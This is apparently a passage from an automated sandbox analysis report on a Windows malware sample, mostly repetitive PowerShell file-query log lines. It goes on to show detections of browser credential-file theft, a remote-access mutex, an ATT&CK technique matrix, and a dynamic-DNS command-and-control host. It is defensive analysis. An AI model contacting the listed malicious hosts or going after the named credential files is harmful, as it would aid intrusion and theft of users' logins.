                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00404915 GetLocalTime,CreateEventA,CreateThread,13_2_00404915
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_0041A7A2 GetComputerNameExW,GetUserNameW,13_2_0041A7A2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00448057 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,13_2_00448057
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match File source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.4110277483.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 13_2_0040B21B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 13_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: \key3.db 13_2_0040B335

                    Remote Access Functionality

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-EC111K
                    Source: Yara match File source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.4110277483.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: cmd.exe 13_2_00405042
MITRE ATT&CK Matrix

Techniques with matched signatures, grouped by tactic column; the count badge printed in the report follows each technique in brackets. Tactic columns whose cells carry no count had no matches.

Reconnaissance: no matched techniques
Resource Development: Scripting (111)
Initial Access: no matched techniques
Execution: Native API (1); Exploitation for Client Execution (1); Command and Scripting Interpreter (13); Service Execution (2); PowerShell (4)
Persistence: Scripting (111); DLL Side-Loading (1); Windows Service (1)
Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (221)
Defense Evasion: Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Virtualization/Sandbox Evasion (21); Access Token Manipulation (1); Process Injection (221)
Credential Access: OS Credential Dumping (1); Input Capture (111); Credentials In Files (2)
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (3); System Information Discovery (34); Security Software Discovery (21); Virtualization/Sandbox Evasion (21); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: no matched techniques
Collection: Archive Collected Data (11); Email Collection (1); Input Capture (111); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (21); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (213)
Exfiltration: no matched techniques
Impact: System Shutdown/Reboot (1); Defacement (1)
Behavior Graph (ID: 1562937; sample: sweetbabygivenbestthignsetn...; start date: 26/11/2024; architecture: WINDOWS; score: 100)

Numbers in square brackets are the graph's node ids; the count badges printed after a process name (created files / registry values) are reproduced as shown.

Start node [2]
  DNS/IP: nextnewupdationsforu.duckdns.org [50] (Uses dynamic DNS services); ip.3105.filemail.com [52]; 3105.filemail.com [54]
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures
  Started: mshta.exe [11]

mshta.exe [11] (badges: 1)
  Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; PowerShell case anomaly found
